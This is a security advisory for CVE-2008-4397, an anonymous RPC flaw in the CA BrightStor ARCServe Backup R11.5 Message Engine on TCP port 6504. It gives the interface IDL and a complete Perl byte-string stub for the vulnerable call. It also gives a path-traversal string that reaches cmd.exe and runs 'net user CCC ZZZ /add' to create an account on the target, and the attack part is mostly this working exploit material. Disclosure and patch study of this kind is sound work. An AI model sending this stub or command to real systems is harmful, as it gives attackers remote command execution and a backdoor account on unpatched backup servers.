|
|
|
|
| |
Credit:
The information has been provided by cocoruder.
|
| |
Vulnerable Systems:
* CA BrightStor ARCServe BackUp version R11.5
Service named "CA BrightStor Message Engine" (Process Name: msgeng.exe) registers a RPC interface which is listening on TCP port 6504, following is some related information:
UUID : 506b1890-14c8-11d1-bbc3-00805fa6962e
Version : 1.0
Listen Port : 6504
Remarkably, we can access this interface anonymously via "ncacn_ip_tcp". The following is the IDL of the function of opnum 0x10A:
/* opcode: 0x156, address: 0x28EB1C00 */
long sub_28EB1C00 (
[in] handle_t arg_1,
[in][string] char * arg_2,
[in][string] char * arg_3,
[in][string] char * arg_4,
[in][string] char * arg_5,
[in] long arg_6,
[in][size_is(arg_1)] char * arg_7,
[in] long arg_8,
[in, out] long * arg_9,
[out][size_is(*arg_9)] char ** arg_10
);
Following is the normal stub of this function:
my $stub=
"\x10\x00\x00\x00\x00\x00\x00\x00". #should equal to remote computer name
"\x10\x00\x00\x00".
"kkk-49ade5b31c1".
"\x00".
"\x08\x00\x00\x00\x00\x00\x00\x00". #will run "aaa.exe"
"\x08\x00\x00\x00".
"aaa.exe"
"\x00".
"\x81\x00\x00\x00\x00\x00\x00\x00". #arg_4
"\x81\x00\x00\x00".
"BBBBBBBBBBBBBBBB".
"BBBBBBBBBBBBBBBB".
"BBBBBBBBBBBBBBBB".
"BBBBBBBBBBBBBBBB".
"BBBBBBBBBBBBBBBB".
"BBBBBBBBBBBBBBBB".
"BBBBBBBBBBBBBBBB".
"BBBBBBBBBBBBBBBB".
"\x00\x00\x00\x00".
"\x01\x00\x00\x00". #arg_5
"\x00\x00\x00\x00".
"\x01\x00\x00\x00".
"\x00\x00\x00\x00".
"\xce\x00\x00\x00". #arg_6
"\xce\x00\x00\x00".
"\xff\xfe\x3c\x00\x3f\x00\x78\x00".
"\x6d\x00\x6c\x00\x20\x00\x76\x00\x65\x00\x72\x00\x73\x00\x69\x00".
"\x6f\x00\x6e\x00\x3d\x00\x22\x00\x31\x00\x2e\x00\x30\x00\x22\x00".
"\x3f\x00\x3e\x00\x0d\x00\x0a\x00\x3c\x00\x52\x00\x45\x00\x50\x00".
"\x4f\x00\x52\x00\x54\x00\x3e\x00\x0d\x00\x0a\x00\x20\x00\x3c\x00".
"\x48\x00\x45\x00\x41\x00\x44\x00\x45\x00\x52\x00\x20\x00\x44\x00".
"\x61\x00\x74\x00\x65\x00\x3d\x00\x22\x00\x79\x00\x65\x00\x73\x00".
"\x22\x00\x3e\x00\x0d\x00\x0a\x00\x3c\x00\x54\x00\x49\x00\x54\x00".
"\x4c\x00\x45\x00\x3e\x00\xcf\x6b\xe5\x65\x07\x59\xfd\x4e\xb6\x72".
"\x01\x60\xa5\x62\x68\x88\x3c\x00\x2f\x00\x54\x00\x49\x00\x54\x00".
"\x4c\x00\x45\x00\x3e\x00\x0d\x00\x0a\x00\x3c\x00\x44\x00\x45\x00".
"\x53\x00\x43\x00\x52\x00\x3e\x00\x28\x57\x4d\x52\x20\x00\x32\x00".
"\x34\x00\x20\x00\x0f\x5c\xf6\x65\x85\x51\x8c\x5b\x10\x62\x84\x76".
"\x07\x59\xfd\x4e\x5c\x4f\x00\x00\x00\x00\x00\x00\xde\x77\x00\x00";
First, the first parameter (victim's computer name) should equal to the real computer name. Second, when we change the string "aaa.exe" such as "../aaa.exe", it will bypass the current directory, if the program has been installed by default, transferring the following string will reach the "cmd.exe" and add an user with "CCC"/"ZZZ"(username/password) on the affected system:
../../../../../../../..//winnt//system32//cmd.exe /c \"net user CCC ZZZ /add\" ||
Solution:
CA has released a bulletin as well as a patch for this vulnerability which can be found at:
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=188143
CVE Information:
CVE-2008-4397
|
|
|
|
|
